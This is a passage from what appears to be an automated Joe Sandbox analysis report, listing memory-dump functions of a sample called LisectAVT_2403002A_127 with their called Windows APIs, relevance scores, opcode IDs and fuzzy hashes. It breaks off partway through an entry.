GetModuleHandleW.KERNELBASE(00000000), ref: 06CB1C96

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0befb774b37d9fe38bffffe304ac6f6fda3c39923ae63b7f6dac460802067a89
Instruction ID: 5872f347d216453197a00688e65c197a1d16ae0c89ced82e950531e13ec27459
Opcode Fuzzy Hash: 0befb774b37d9fe38bffffe304ac6f6fda3c39923ae63b7f6dac460802067a89
Instruction Fuzzy Hash: 0E1120B5C04349CFCB20DF9AC844ADEFBF4AF89310F24842AD859A7611C375A649CFA5

Function 06CB0CAC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06CB1C96

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4059a5b585c6eea71767a62075b3cd89d8601948df4deebdbb94e0cf2abd29fc
Instruction ID: fdbad8866bdfd5c411669e505f493b7de4086eef6555dadacfe54119d95062b9
Opcode Fuzzy Hash: 4059a5b585c6eea71767a62075b3cd89d8601948df4deebdbb94e0cf2abd29fc
Instruction Fuzzy Hash: FC11FDB6C007498FDB20DF9AC848ADEFBF4AB88210F14842AD919B7610C379A545CFA5

Function 06CB8661 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06CB86BD

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5ac0eef3bf27a09a4bea6968410aa2b10c8db8c85c3dc2e35ba85c00273ef47c
Instruction ID: 4a6c630123e6e07bc2f7ec23fa2bddda0b9174005ec1dbc4acdc7119b35f6d31
Opcode Fuzzy Hash: 5ac0eef3bf27a09a4bea6968410aa2b10c8db8c85c3dc2e35ba85c00273ef47c
Instruction Fuzzy Hash: 421122B1800349CFCB20DF9AD489BCEFBF8AB48320F20845AD558A7610C379A544CFA5

Function 06CB677C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CB7D75), ref: 06CB7DFF

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1be772e2ae78d10464b894a404ddd63beba51b7db57eb93aee94a679b87b10d1
Instruction ID: ba379b1d54af5b2627450dcbb63ce2be5246eddc99bbfa3e9045a42b5de708cf
Opcode Fuzzy Hash: 1be772e2ae78d10464b894a404ddd63beba51b7db57eb93aee94a679b87b10d1
Instruction Fuzzy Hash: FE1133B0800349CFDB60DF9AC449BDEBBF4EB88714F20845AD919A7210C375A944CFA5

Function 06CB8070 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06CB86BD

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8f2b62d77c8d7539a9831ba72e035f0926cd6526d3d96fe034fef2463185b04a
Instruction ID: 2059c9c99d620f13e87b23b2ff4fa3487d6241a357dc33e125e5c79d83194abe
Opcode Fuzzy Hash: 8f2b62d77c8d7539a9831ba72e035f0926cd6526d3d96fe034fef2463185b04a
Instruction Fuzzy Hash: 751145B0800348CFDB20DF9AC449BDEBBF8EB48310F108459D518A7310C378A944CFA5

Function 06CB7D98 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CB7D75), ref: 06CB7DFF

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 678b2f8591ef210f7d757f50953569aeeeb8aa4f049123a4e85dcbf3ac6cf1d5
Instruction ID: db3c5ab28a897a66e57753206aa7e04f8b62243a0d885a3a3ea875256530f08f
Opcode Fuzzy Hash: 678b2f8591ef210f7d757f50953569aeeeb8aa4f049123a4e85dcbf3ac6cf1d5
Instruction Fuzzy Hash: BF11F5B1800249CFDB20DF9AD449BDEBBF4AF48714F208419D558A7250C375A944CFA5

Function 06CCD450 Relevance: .8, Instructions: 795COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f262f9f9028bae4e36d3779da42c86fb5c79da75d87d2883f2f831079bb9df
Instruction ID: 04de680b6ae1ddbcd06ad7d911dbb29f58ffa68b9402e4c0b24df41a24955419
Opcode Fuzzy Hash: b2f262f9f9028bae4e36d3779da42c86fb5c79da75d87d2883f2f831079bb9df
Instruction Fuzzy Hash: F8623C30A0020A8FDB55EB69E590A9DB7B2FF85710F608A3DD0069F255EB75FD46CB80

Function 06CCADD0 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9da2fbde112fbbe5345b540cf1517484f06e95183867145b7377dcddfe27876
Instruction ID: 6b572b01f461bee6c216a67d098fefad6bb282a05272c3098b42be80dc88f9c0
Opcode Fuzzy Hash: a9da2fbde112fbbe5345b540cf1517484f06e95183867145b7377dcddfe27876
Instruction Fuzzy Hash: A6E16F30E1020A8FDF64DBA9D8946AEB7B6FF89314F20852DE405EB345DB349D46CB91

Function 06CCB328 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d4be51b738b78460e4d0864f26d04d11954708efaa7f45591d35d449e137f9
Instruction ID: 1ae187f0107bb3329f64381144b2d9e70adf88e383d2670656846b33bcae74a8
Opcode Fuzzy Hash: 71d4be51b738b78460e4d0864f26d04d11954708efaa7f45591d35d449e137f9
Instruction Fuzzy Hash: 26A19234F101099BEF64CAEDD4917AEB7B6FB89320F64442DE409E7385DA38DD818B61

Function 06CC9258 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ccf68fd2bd2b84af37173b58243b170d81d15233553a5af285e57201d04289
Instruction ID: 880261567e2471e6354ea27a9b5bc5214572eabd7054ff322d73b245de7e8a7e
Opcode Fuzzy Hash: 11ccf68fd2bd2b84af37173b58243b170d81d15233553a5af285e57201d04289
Instruction Fuzzy Hash: CB914F34B0025A8FDB54DB69D8A0BAE73B2FFC5710F108569C80AAB345EB35ED458B91

Function 06CC62F0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1731133291419fa2f059ca43e343a6d4ea15d3f77b7054d85b53ca9fa29cb420
Instruction ID: a4b9de17ee4e622944cbea693a20816fb4c2b90f855df99cd85cb7dd92587a5e
Opcode Fuzzy Hash: 1731133291419fa2f059ca43e343a6d4ea15d3f77b7054d85b53ca9fa29cb420
Instruction Fuzzy Hash: 0461D372F001224BDF50DA7ED99066FBAE7AFC5220B19407DD80ADB364DE65ED0287C1

Function 06CC43A8 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b67915a3558ac09a871e2949d7cad4a367080dae821f2edc5149ac7c092f95
Instruction ID: f226c388a47592276a316ad6676b956418a2a9072c07d8a8d2b1705dfd23ce77
Opcode Fuzzy Hash: c6b67915a3558ac09a871e2949d7cad4a367080dae821f2edc5149ac7c092f95
Instruction Fuzzy Hash: C3814E34B012468BDB58DFA9D4A47AEB7F2AF89314F20C529D40ADB344EB34DD428B90

Function 06CC43B8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c08747142e32db71f9127396145d627fa9f11eb1aa2febb982fdfcacfefc83
Instruction ID: 2856cea50e6b2db020eec339aa84c39ef63fa0aeef611f884e4022c41fc56669
Opcode Fuzzy Hash: 65c08747142e32db71f9127396145d627fa9f11eb1aa2febb982fdfcacfefc83
Instruction Fuzzy Hash: FA814E34B012468BDB58DFA9D4A476EB7F2AFC9314F20C529D40ADB344EB34DD428B91

Function 06CC46C4 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6051fedefd4d9f7e89c8011c267d9236d68306dd4a8f7af2c0ceacda063b0aaa
Instruction ID: e994d43c4d817edeb575387fcde64b8e0dcc2a2d8ee4ba4b67b88bb01842d610
Opcode Fuzzy Hash: 6051fedefd4d9f7e89c8011c267d9236d68306dd4a8f7af2c0ceacda063b0aaa
Instruction Fuzzy Hash: B3912A30E1061A8BDF64DB68C890B9DB7B1FF89310F20C699D549AB245DB71AA85CB90

Function 06CC46D8 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a0a52dd52b6771bf34ed5346805e8f31363c8e7b1f2db3908e6c47dc8bec55
Instruction ID: dae0e274a1220eff8be05caf30d2e5f7cea0a437ac581495888463c10e341d2f
Opcode Fuzzy Hash: 52a0a52dd52b6771bf34ed5346805e8f31363c8e7b1f2db3908e6c47dc8bec55
Instruction Fuzzy Hash: E2912A34E1061A8BDF64DF68C890B9DB7B1FF89310F20C699D549AB345DB70AA85CF90

Function 06CCF017 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56aa8bfbd6625644b71e70b396b2bb6e98807fd8f5792105fd231577473cdc87
Instruction ID: a7564d8a73b76f21b6e06ab68924b74e05a8e0344563c96df9ecb9ece4edf025
Opcode Fuzzy Hash: 56aa8bfbd6625644b71e70b396b2bb6e98807fd8f5792105fd231577473cdc87
Instruction Fuzzy Hash: 7A713670A002499FDB54DBA9D990AADBBF6FF88310F24842DD415EB355EB30ED46CB50

Function 06CCF028 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04370b5573e3e54821c1457454d136b423ede548fe9e2780306c0d67561a4036
Instruction ID: b7c126555389b28cdb613fcdac5866bf17094ce9cbb781bcb8f3d5896398dd25
Opcode Fuzzy Hash: 04370b5573e3e54821c1457454d136b423ede548fe9e2780306c0d67561a4036
Instruction Fuzzy Hash: 28713770A002499FDB54DBA9D990AAEBBF6FF88310F24842DD415EB359DB30ED46CB50

Function 06CC4C70 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c44b63561513c020cfc09b0c26d7253edcd98b039a4b4ffb07ceb3856be9a5
Instruction ID: 0ae2a4b7443b94289d490281152f4c5f9e689d0b0313fd504886503372a952e6
Opcode Fuzzy Hash: 83c44b63561513c020cfc09b0c26d7253edcd98b039a4b4ffb07ceb3856be9a5
Instruction Fuzzy Hash: C4619C70E102099FEB58DBA5C8547AEBBF6FF88310F20842EE506AB395DE755C458B90

Function 06CCFCA7 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2604714811550c74f732b4cd85a6f5b48776068f14128ad62cd703e97753c75
Instruction ID: c658b70c308b4c27e0fdc3d04ac9690d3b51dac0540910e904685f9d5ced4fcf
Opcode Fuzzy Hash: c2604714811550c74f732b4cd85a6f5b48776068f14128ad62cd703e97753c75
Instruction Fuzzy Hash: 3A51D031E01105DFDB28AFB8E4946ADB7B3EF84325F20886EE126D7251DB358D55CB80

Function 06CCFA58 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a8f5e5e7174cee59e93ee85e7370d938b58cb8aca08b4c40a9c30501a05399
Instruction ID: 626d6e058d337cc84bba1f0dade136cc1eba1bd16711651c8428ddb069028d40
Opcode Fuzzy Hash: f1a8f5e5e7174cee59e93ee85e7370d938b58cb8aca08b4c40a9c30501a05399
Instruction Fuzzy Hash: 2251B470B10104CBEF645BB8D864B7E767BDB8A720F20443EE50AD7391C96CCD8187A1

Function 06CCFA68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efabb775a4955796572e4eefd4bb29cab06f51c499344ded321897f545ff1c3
Instruction ID: a9645b2e05572a0d5dfacae7a3738d73b3c8a138731841bb5b2c121b3ee0303a
Opcode Fuzzy Hash: 7efabb775a4955796572e4eefd4bb29cab06f51c499344ded321897f545ff1c3
Instruction Fuzzy Hash: 2E51A270B20104CBEF645BA8D864B7E766BDB8A720F20443EE51AD7391C96CCD9187A2

Function 06CC9249 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed1b7847093549fac2d2d854033eb09e413e92c81619c1a1bfe43ce7f7685bf
Instruction ID: 8f1fa26029cb1d904ccf6e07becf36972bbd19b7d8790ecd304201c8e53f7784
Opcode Fuzzy Hash: 5ed1b7847093549fac2d2d854033eb09e413e92c81619c1a1bfe43ce7f7685bf
Instruction Fuzzy Hash: F3513E34B011568BEB54DB75D8A0BAE73F2BFC9710F148469C40ADB348EB35DC428B90

Function 06CC4C60 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6846fe52945c80d88ade6de1270a027b4e197c11662cc4b38ce9bf591d3e01d8
Instruction ID: 4e2bba39e6df14668678c40ece58a57a7ca49cf8b5c8714b5778e4c6b47191fb
Opcode Fuzzy Hash: 6846fe52945c80d88ade6de1270a027b4e197c11662cc4b38ce9bf591d3e01d8
Instruction Fuzzy Hash: 8D51BD30A102199FDB58DFE9C854BAEBBF2EF88310F20852DE045AB395DB749C45CB90

Function 06CC5530 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3103d1df8b6d577e2309ed74e90b38aebe094a082c4fb828f251c2eaab05ca0c
Instruction ID: a44e108303ed2da87451dbdb957a49920079863cebfe643a9cf7495bc27cfe9b
Opcode Fuzzy Hash: 3103d1df8b6d577e2309ed74e90b38aebe094a082c4fb828f251c2eaab05ca0c
Instruction Fuzzy Hash: 50412A71E006098FDF70CEA9D880AAFF7B2EB95224F50492EE116D7650D730F9658B90

Function 06CCDFD0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12426d6faba5baab5d46cc9d533794222d62c7940e8e7d40f123aff1ad031b2
Instruction ID: 809fe38d4b7e7d41796c88014a22ed2941bff95574249231ec865abf5591fb8a
Opcode Fuzzy Hash: e12426d6faba5baab5d46cc9d533794222d62c7940e8e7d40f123aff1ad031b2
Instruction Fuzzy Hash: 68418130E0024ADFDB64DF65D4546AEBBB6FF8A750F10442DD405EB240EB75E945CB80

Function 06CCDFBD Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e097713b659f097eb2ac536d6b34033317aaabef2aced81d9eced889553dd301
Instruction ID: 3357d768d643f34e3f8a7d914bec6cc521674502620dcb40b5e6d0d548694fea
Opcode Fuzzy Hash: e097713b659f097eb2ac536d6b34033317aaabef2aced81d9eced889553dd301
Instruction Fuzzy Hash: B141C330E0025ADFDB65DF65D85469EBBB2FF8A710F20452DD405EB240EB31E946CB80

Function 06CC21BD Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e218da549518884f08446cfc4ea23f1b5bfc85e4b871de3324ecd97876d7f4c
Instruction ID: 4539f83b06be8b820a10ec6a4ad07a6ce0136aed9c04cab67c4c81afa3433ab4
Opcode Fuzzy Hash: 8e218da549518884f08446cfc4ea23f1b5bfc85e4b871de3324ecd97876d7f4c
Instruction Fuzzy Hash: 9B312130B102029FDB599B74D4646AE7BB7AF8A760F54446CD402DB385DF39CE42C791

Function 06CC21D0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8032aba0eaf8c1454326185f1cc85148ae1fd9309a23805f34d6c3363b0695
Instruction ID: a98cb3dbecd5349c5cf86a0cd3731402ffa57f33eebfc48e25cf5c6c8133ab31
Opcode Fuzzy Hash: 8f8032aba0eaf8c1454326185f1cc85148ae1fd9309a23805f34d6c3363b0695
Instruction Fuzzy Hash: A131FE30B102069FDB58AB79D46866E7BA7BFC9760F64442CC402DB384EE39DE41C791

Function 06CC2080 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b1a38866513ce3f2d01c0f88a5e1e99496ab663f10c0107b0c0a2a1121904c
Instruction ID: 77b8d8066b8ac31f889594cf2b0a1804c1e7f53f0a36f2a09a9a751f62518234
Opcode Fuzzy Hash: 53b1a38866513ce3f2d01c0f88a5e1e99496ab663f10c0107b0c0a2a1121904c
Instruction Fuzzy Hash: D6318330E112459BCB15DFA8D8947AEB7B2BF89310F10892DE905E7340DB75ED42CB40

Function 06CC2090 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e230891159148d2cb713a9ab6aa2467b42d8bd91f270e052d974a0fc955bb91b
Instruction ID: 07e04383ae877d129e711415d43056eb75f747386a588badc3bbb274075f4df8
Opcode Fuzzy Hash: e230891159148d2cb713a9ab6aa2467b42d8bd91f270e052d974a0fc955bb91b
Instruction Fuzzy Hash: 35315030E102499BDB15DFA9D8546AEB7B2FF89710F10892DE906E7350DB75ED41CB80

Function 06CC3FB1 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63447b17040280d6ded3bdb63d4f90a852e2d603b8ddb5753399b45207dd9f5
Instruction ID: cf4030c54273de953b6c5ac109a9afdd805555abf7646496956f81cddd89a417
Opcode Fuzzy Hash: a63447b17040280d6ded3bdb63d4f90a852e2d603b8ddb5753399b45207dd9f5
Instruction Fuzzy Hash: 21219A75F412559FDB50CF69E880AAEBBF1EB88320F108069E909EB350E739DD458B90

Function 06CC3FC0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5f94a51747fe7051b811f0a72f95e1dc5eded874618c61e9dc135958d554ab
Instruction ID: 49d3d539da3ce67b6d883ea04eaeb4822957632edd88149aaa9f4ab055ea1645
Opcode Fuzzy Hash: ac5f94a51747fe7051b811f0a72f95e1dc5eded874618c61e9dc135958d554ab
Instruction Fuzzy Hash: 5C219D75F012559FDB50CF6AE980AAEBBF5EB88720F108069E905E7380E739DD40CB90

Function 06CC6E10 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ceda4d7ca046c9d073f3d088a90b576a083b9828fca52e9b1af4afeed3382b
Instruction ID: 58510d17d58f9a50af18528cd10509a46ee405bb3dbf568a0f24f11f40d28de8
Opcode Fuzzy Hash: c1ceda4d7ca046c9d073f3d088a90b576a083b9828fca52e9b1af4afeed3382b
Instruction Fuzzy Hash: 07219230B011199BDF94DB6EE99079EB7B6EF85360F20842ED405EB341EB35DD568B80

Function 012CD20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd792fc37768c38934848a0fbdf469e9581c41487b68b19b31cd851eebfd077
Instruction ID: 22263c441c8b807aff4292843c33396719646f434835b424b90cc939dc7351a4
Opcode Fuzzy Hash: dfd792fc37768c38934848a0fbdf469e9581c41487b68b19b31cd851eebfd077
Instruction Fuzzy Hash: DB21F672514248EFDB01DF54D9C4B26BB66FB84B34F24C67DDA490B243C376D446CAA2

Function 012CD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e875256681dd911166550134ed46bb35656ca0c5d47a9b93478634fca6e3c04c
Instruction ID: 4fcc52c883e76da324c5e17a6bb574fa5857c9a309bc38c6cd1392576aa22e9d
Opcode Fuzzy Hash: e875256681dd911166550134ed46bb35656ca0c5d47a9b93478634fca6e3c04c
Instruction Fuzzy Hash: 59213771514208EFDB11DF68D9C0B26BB61FB84714F20C67DEA490B242C777D446CAA2

Function 012CD3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4573183503.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12cd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5027e1aaa409823fa022b4ead9ba564cb914900a24fdb92b44426cafe0b1251f
